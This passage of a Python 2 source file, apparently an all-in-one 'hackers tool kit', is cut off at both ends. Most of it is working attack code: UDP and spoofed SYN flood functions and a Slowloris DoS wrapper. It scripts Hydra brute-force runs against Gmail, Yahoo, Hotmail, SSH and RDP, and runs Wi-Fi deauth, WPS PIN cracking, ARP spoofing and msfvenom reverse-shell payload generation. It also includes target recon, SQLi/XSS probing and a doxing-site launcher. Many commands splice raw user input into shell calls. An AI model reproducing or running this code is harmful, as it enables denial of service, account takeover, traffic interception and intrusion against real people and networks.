requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - print "\nExamples: py, php, exe\n" - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def 